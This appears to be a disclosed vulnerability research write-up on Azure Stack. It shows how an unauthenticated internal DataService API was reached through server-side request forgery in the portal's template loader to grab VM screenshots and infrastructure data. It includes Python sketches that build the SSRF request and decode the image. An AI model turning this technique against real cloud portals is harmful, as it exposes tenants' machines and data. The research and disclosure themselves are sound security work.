Remote Cloud Execution – Critical Vulnerabilities in Azure Cloud Infrastructure (Part I)

Ronen Shustin

Cloud Attack Part I

Motivation

Cloud security is like voodoo. Clients blindly trust the cloud providers and the security they provide. If we look at popular cloud vulnerabilities, we see that most of them focus on the security of the client’s applications (aka misconfigurations or vulnerable applications), and not the cloud provider infrastructure itself. We wanted to disprove the assumption that cloud infrastructures are secure. In this part, we demonstrate various attack vectors and vulnerabilities we found on Azure Stack.

Check Point Research informed Microsoft Security Response Center about the vulnerabilities exposed in this research, and a solution was responsibly deployed to ensure its users can safely continue using Azure Stack.

Setting up a research environment

Researching cloud components can be difficult, particularly as most of the time it’s “black box” research. Fortunately, Microsoft has an on-premises Azure environment called Azure Stack, which is meant primarily for enterprise usage. There is also a free version called Azure Stack Development Kit (ASDK). All you have to do is get a single server that meets the installation hardware requirements and follow the detailed installation guides. Once the installation is finished, you are greeted with the User/Admin Portal, which looks very similar to the Azure Portal:

By default, ASDK comes with a small set of features (core components) which can be extended with features like SQL Providers, App Service and more. With that said, let’s see how ASDK compares to Azure.

Main differences between Azure and ASDK

Scalability: ASDK runs on a single instance with limited resources, and all of its roles run as separate VMs handled by Hyper-V. This causes some internal architectural differences.



ASDK doesn’t run the latest software as Azure does, but is a couple of versions behind.

Compared to Azure, ASDK has a very limited number of features.

Azure Stack Overview

Note – Most of the data in this section is taken from this book

Let’s break down the diagram by layers:

First, we have the Azure Stack portal that provides a simple and accessible UI, along with Templates, PowerShell, etc. These components are used for deploying and managing resources and are the common interfaces in Azure Stack. They are built on top of and interact with the Azure Resource Manager (ARM). The ARM decides which requests it can handle and which need to be passed on to another layer.

The partition request broker includes the core resource providers in Azure Stack. Each resource provider has an API that works back and forth with the ARM layer. A resource provider is what allows you to communicate with the underlying layer, and it includes user/admin extensions that are accessible from the portal.

The next layer underneath contains the infrastructure controllers which communicate with the infrastructure roles. This layer has a set of internal APIs which are not exposed to the user.

The infrastructure roles are responsible for tasks such as computing, networking, storage and more.

Finally, the infrastructure roles contain all the management components of Azure Stack, interacting with the underlying hardware layer to abstract hardware features into high-level software services that Azure Stack provides.

ASDK is based on Hyper-V, meaning all of its roles run as separate virtual machines on the host server. The infrastructure has separate virtual networks that isolate them from the host network.

By default, there are several infrastructure roles that are deployed, including:

Name: Description
AzS-ACS01: Azure Stack storage services.
AzS-ADFS01: Active Directory Federation Services (ADFS).
AzS-CA01: Certificate authority services for Azure Stack role services.
AzS-DC01: Active Directory, DNS, and DHCP services for Microsoft Azure Stack.
AzS-ERCS01: Emergency Recovery Console VM.
AzS-GWY01: Edge gateway services such as VPN site-to-site connections for tenant networks.
AzS-NC01: Network Controller, which manages Azure Stack network services.
AzS-SLB01: Load balancing multiplexer services in Azure Stack for both tenants and Azure Stack infrastructure services.
AzS-SQL01: Internal data store for Azure Stack infrastructure roles.
AzS-WAS01: Azure Stack administrative portal and Azure Resource Manager services.
AzS-WASP01: Azure Stack user (tenant) portal and Azure Resource Manager services.
AzS-XRP01: Infrastructure management controller for Microsoft Azure Stack, including the Compute, Network, and Storage resource providers.

Source: https://docs.microsoft.com/en-us/azure-stack/asdk/asdk-architecture

If we break down the main abstract layers in the diagram above into the main virtual machines:

ARM Layer: AzS-WAS01, AzS-WASP01

RP Layer + Infrastructure Control Layer: AzS-XRP01

Let’s look at an example that demonstrates how all the abstract layers in the diagram work together:

A tenant wants to stop a virtual machine in Azure Stack. How does this work?

The tenant can use the User Portal, CLI, or PowerShell to perform this action. All these interfaces eventually send an HTTP request that describes the desired action to the ARM (Azure Resource Manager), which runs on AzS-WASP01. The ARM performs its necessary checks (for example, whether the requested resource exists and whether it belongs to the tenant), and tries to perform the action. There are actions the ARM can’t handle by itself, such as compute and storage operations. Therefore, it forwards the request with additional parameters to the correct resource provider, in this case the one that handles virtual machine compute operations (which runs on AzS-XRP01). There is an internal chain of API requests until eventually the virtual machine located in the Hyper-V cluster is shut down. The result is forwarded back along the request chain to the tenant.
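The flow above can be modelled as a toy dispatcher. This is only an illustrative Python sketch, not Azure Stack code: the `Request` type, the in-memory `RESOURCES` inventory, the status strings and the `compute_provider` function are all hypothetical stand-ins for the ARM checks and the resource provider hand-off.

```python
from dataclasses import dataclass


@dataclass
class Request:
    tenant: str
    resource_id: str
    action: str


# Hypothetical inventory: resource ID -> owning tenant.
RESOURCES = {"vm-1": "tenant-a"}


def compute_provider(req: Request) -> str:
    # Stands in for the internal chain of API calls that ends at Hyper-V.
    return f"{req.resource_id}: {req.action} done"


# Hypothetical mapping of actions the ARM cannot handle itself to providers.
PROVIDERS = {"stop": compute_provider}


def arm_handle(req: Request) -> str:
    owner = RESOURCES.get(req.resource_id)
    if owner is None:
        return "404 resource not found"      # resource existence check
    if owner != req.tenant:
        return "403 not owned by tenant"     # ownership check
    provider = PROVIDERS.get(req.action)
    if provider is None:
        return "400 unsupported action"
    # Forward to the resource provider and pass its result back up the chain.
    return "200 " + provider(req)
```

The point of the sketch is that the authorization checks live in the ARM layer; a service further down the chain that is reachable directly never sees them.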

In the following section, we describe in detail an issue we found in one of the internal services that allowed us to grab screenshots of the tenant and infrastructure machines.

Screenshot grabbing and information disclosure

Service Fabric Explorer is a web tool pre-installed in the machine that takes the role of the RP and Infrastructure Control Layer (AzS-XRP01). This enables us to view the internal services which are built as Service Fabric Applications (located in the RP Layer).

When we tried to access the URLs of the services from the Service Fabric Explorer, we noticed that some of them don’t require authentication (usually such services require certificate authentication or HTTP authentication).

We had some questions:

Why don’t these services require authentication?

What API do they expose?

These services are written in C# and their source code is not public, so we had to use a decompiler to research them. This required us to understand the structure of the Service Fabric applications.

One particular service that didn’t require authentication is called “DataService”. Our first task was to find where this service is located on the AzS-XRP01 machine. We found this easily by running a WMI query to list the running processes:

The result revealed the location of all the Service Fabric services on the machine, including DataService. A directory listing of the DataService code folder revealed many DLLs, but their names indicate their purpose:

Decompiling the DLLs gave us the ability to explore the code and find the mapping for the API HTTP routes:

We can see that if the HTTP URI matches one of the route templates, the request is handled by a specific controller, which is a common REST API implementation. Most of the route templates require at least one parameter that we don’t necessarily know. Therefore, we first started looking at those that don’t require additional parameters:

QueryVirtualMachineInstanceView

QueryClusterInstanceView
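To illustrate how route templates map a URI to a controller, here is a minimal Python sketch of template matching. It is not the decompiled DataService code. The `virtualMachines/allocation` path and the controller names come from this article; the screenshot template shown here is a hypothetical placeholder, since the real template is not reproduced in the text.

```python
import re

# Template -> controller. The second template is an assumed shape for
# illustration only.
ROUTES = {
    "virtualMachines/allocation": "QueryVirtualMachineInstanceView",
    "virtualMachines/{virtualMachineId}/screenshot": "VirtualMachineScreenshot",
}


def compile_template(template: str) -> "re.Pattern[str]":
    # re.split with a capturing group yields literal, name, literal, ...
    parts = re.split(r"\{(\w+)\}", template)
    pattern = ""
    for index, part in enumerate(parts):
        if index % 2 == 0:
            pattern += re.escape(part)           # literal path text
        else:
            pattern += f"(?P<{part}>[^/]+)"      # one path segment parameter
    return re.compile("^" + pattern + "$")


def match_route(path: str):
    """Return (controller, parameters) for the first matching template."""
    for template, controller in ROUTES.items():
        match = compile_template(template).match(path.strip("/"))
        if match:
            return controller, match.groupdict()
    return None
```

A template with no `{...}` placeholders, such as the two listed above, can be requested without knowing any identifiers in advance, which is why those routes are the natural starting point.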

As Azure Stack runs locally on our machine, we can just browse these APIs locally to see how they respond.

When accessing the virtualMachines/allocation API ( QueryVirtualMachineInstanceView ), it returns a large XML/JSON file (depending on the Accept header you send) which contains a lot of data about infrastructure/tenant machines located on the Hyper-V node in the cluster.

This is a snippet from the information returned. We can see here interesting stuff like the virtual machine name and ID, hardware information like cores, total memory, etc.
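The Accept header behaviour mentioned above can be sketched as follows. This Python snippet only builds the request object and does not send anything. The base URL is a hypothetical placeholder (the real host and port are not given in the text), and the two media types are assumed to be the standard JSON and XML ones.

```python
from urllib.request import Request

# Hypothetical placeholder; the real DataService address is not shown here.
BASE_URL = "https://dataservice.example.invalid"

# Assumed standard media types for the two response formats.
MEDIA_TYPES = {"json": "application/json", "xml": "application/xml"}


def build_allocation_request(fmt: str = "json") -> Request:
    """Build (but do not send) a GET for the virtualMachines/allocation API."""
    return Request(
        f"{BASE_URL}/virtualMachines/allocation",
        headers={"Accept": MEDIA_TYPES[fmt]},  # selects the response format
        method="GET",
    )
```

Note that the request carries no credentials at all, which mirrors the observation that the service did not require authentication.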

Now that we know there is an API that can provide information about the infrastructure/tenant machines, we can look at the API calls that require other parameters. For example, the VirtualMachineScreenshot looks interesting, so let’s see how it works.

According to the template, several parameters must be supplied to route the request through the VirtualMachineScreenshot controller:

virtualMachineId – The ID of the machine on which we want to invoke the operation. The ID is provided by the QueryVirtualMachineInstanceView API call.

heightPixels, widthPixels – The dimensions of the screenshot.

When all of these parameters are provided, the GetVirtualMachineScreenshot function is invoked:

If the virtual machine ID is valid and exists, the GetVmScreenshot function is called. This actually “proxies” the request into another internal service.

We can see that it creates a new request with the specified parameters and passes it to the request executor. The internal service which will process this request is called “Compute Cluster Manager” (located in the Infrastructure Control Layer). From its name, we see that it manages the compute clusters, and can perform relevant actions. Let’s see how this service handles the screenshot request:

First, we encounter this wrapper function, which calls another GetVmScreenshot on the vmScreenshotCollector instance. However, we can see that there is a new parameter, a flag that determines if the compute cluster contains only a single host/node.

After GetVirtualMachineOwnerNode figures out which node of the cluster the virtual machine is located on, it calls the GetVmThumbnail function:

It seems like this function constructs a remote PowerShell command which it executes on the compute node (this is how most of the compute operations work). Let’s look at the compute node and see how Get-CpiVmThumbnail is implemented:

This is the PowerShell implementation of this function. It looks like it executes GetVirtualSystemThumbnailImage, which is a Hyper-V WMI call that grabs the thumbnail for the virtual machine. The thumbnail is the small window at the bottom left of the machine overview in Hyper-V:

However, because the caller can specify the dimensions, the thumbnail can be requested at a size that makes it equivalent to a full-quality screenshot.

Now that we have a good understanding of the primitives contained in “DataService”, let’s get back to our first question: Why doesn’t it require authentication? We actually don’t know the answer, but it should absolutely require authentication. We approached this by asking an additional question: In what scenario can we access this service from outside? The answer is SSRF, but where should we start looking? The obvious choice is the User Portal. It is accessible to the tenants and can access services such as ARM. On Azure Stack, it can even directly access the internal services.

Azure Stack and Azure can deploy resources from a template. The template can be loaded from a local file, or a remote URL. It is a very simple feature and also interesting in terms of SSRF, because it sends a GET request to a URL to retrieve data. This is the implementation of the remote template loading (used as Ajax):

The GetStringAsync function sends an HTTP GET request to the templateUri and returns the data as JSON. There is no validation on whether the host is internal or external (and it supports IPv6). Therefore, this method is a perfect candidate for SSRF. Although this allows only GET requests, as we’ve seen above, it’s sufficient for accessing the DataService.
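For contrast, here is a minimal Python sketch of the kind of host check that was missing. It is an illustration under stated assumptions, not Microsoft's fix: the function name and the three labels are hypothetical, and it only classifies IP literals. Hostnames are flagged as needing DNS resolution, which a real check would also have to handle (along with redirects).

```python
import ipaddress
from urllib.parse import urlsplit


def classify_host(url: str) -> str:
    """Classify a URL's host as 'internal', 'external' or 'needs-resolution'."""
    host = urlsplit(url).hostname    # strips the port and IPv6 brackets
    if not host:
        return "internal"            # treat unparseable input as unsafe
    try:
        address = ipaddress.ip_address(host)   # accepts IPv4 and IPv6 literals
    except ValueError:
        return "needs-resolution"    # a hostname; resolve it before deciding
    if (address.is_private or address.is_loopback
            or address.is_link_local or address.is_unspecified):
        return "internal"
    return "external"
```

Because `ipaddress` handles both address families, an IPv6 literal such as `[::1]` is classified the same way as `127.0.0.1`.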

So let’s use an example. We want to get a screenshot from a machine whose ID is f6789665-5e37-45b8-96d9-7d7d55b59be6 with the 800×600 dimensions:
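As a rough Python sketch of how such a request could be assembled: the inner DataService URL is URL-encoded and passed as the template URI. Both host names, both paths, and the choice to pass the dimensions as query parameters are hypothetical placeholders; only the parameter names, the machine ID and the dimensions come from the text.

```python
from urllib.parse import urlencode

# Hypothetical placeholders; the real endpoints are not reproduced here.
PORTAL_TEMPLATE_ENDPOINT = "https://portal.example.invalid/api/loadTemplate"
DATASERVICE_BASE = "https://dataservice.example.invalid"


def build_ssrf_url(vm_id: str, width: int, height: int) -> str:
    # Inner request: the one the portal server ends up sending on our behalf.
    inner = (
        f"{DATASERVICE_BASE}/virtualMachines/{vm_id}/screenshot?"
        + urlencode({"heightPixels": height, "widthPixels": width})
    )
    # Outer request: urlencode percent-encodes the inner URL so it survives
    # as a single templateUri parameter value.
    return f"{PORTAL_TEMPLATE_ENDPOINT}?" + urlencode({"templateUri": inner})


url = build_ssrf_url("f6789665-5e37-45b8-96d9-7d7d55b59be6", 800, 600)
```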

The response we got is Base64 encoded raw image data.
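A minimal Python sketch of the decoding step follows. It assumes the raw data is 16-bit RGB565 pixels in little-endian order; that layout is an assumption and is not stated in the text. The output is a binary PPM image, chosen only because it needs no third-party library.

```python
import base64
import struct


def rgb565_to_ppm(raw: bytes, width: int, height: int) -> bytes:
    """Convert raw RGB565 pixels (assumed layout) into a binary PPM image."""
    expected = width * height * 2            # two bytes per pixel
    if len(raw) != expected:
        raise ValueError(f"expected {expected} bytes, got {len(raw)}")
    pixels = struct.unpack(f"<{width * height}H", raw)
    out = bytearray(f"P6\n{width} {height}\n255\n".encode("ascii"))
    for pixel in pixels:
        red = (pixel >> 11) & 0x1F           # top 5 bits
        green = (pixel >> 5) & 0x3F          # middle 6 bits
        blue = pixel & 0x1F                  # low 5 bits
        # Scale each channel to the 0..255 range.
        out += bytes((red * 255 // 31, green * 255 // 63, blue * 255 // 31))
    return bytes(out)


def decode_screenshot(b64_text: str, width: int, height: int) -> bytes:
    return rgb565_to_ppm(base64.b64decode(b64_text), width, height)
```

Writing the returned bytes to a file with a `.ppm` extension gives an image most viewers can open. If the service returned a different pixel format, only `rgb565_to_ppm` would need to change.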

We can now take the data we got and transform it into an actual image. Here is an example using PowerShell:

We will get this image:

Conclusion

In this part, we showed how a small logical bug can sometimes be leveraged into a serious issue. In our case, because DataService didn’t require authentication, this eventually allowed us to get screenshots and information about tenants and infrastructure machines.

In the second part, we will take a deep dive into Azure App Service internals, examine its architecture and attack vectors, and demonstrate how a critical vulnerability we found in one of its components affected Azure Cloud.

The SSRF vulnerability (CVE-2019-1234) was disclosed and fixed by Microsoft, and was awarded $5,000 from Microsoft’s bug bounty program.

The unauthenticated internal API issue was also separately discovered by Microsoft, and was addressed in late 2018 in the Azure Stack 1811 update.

In the next part, we disclose a critical vulnerability we found in the Azure App Service.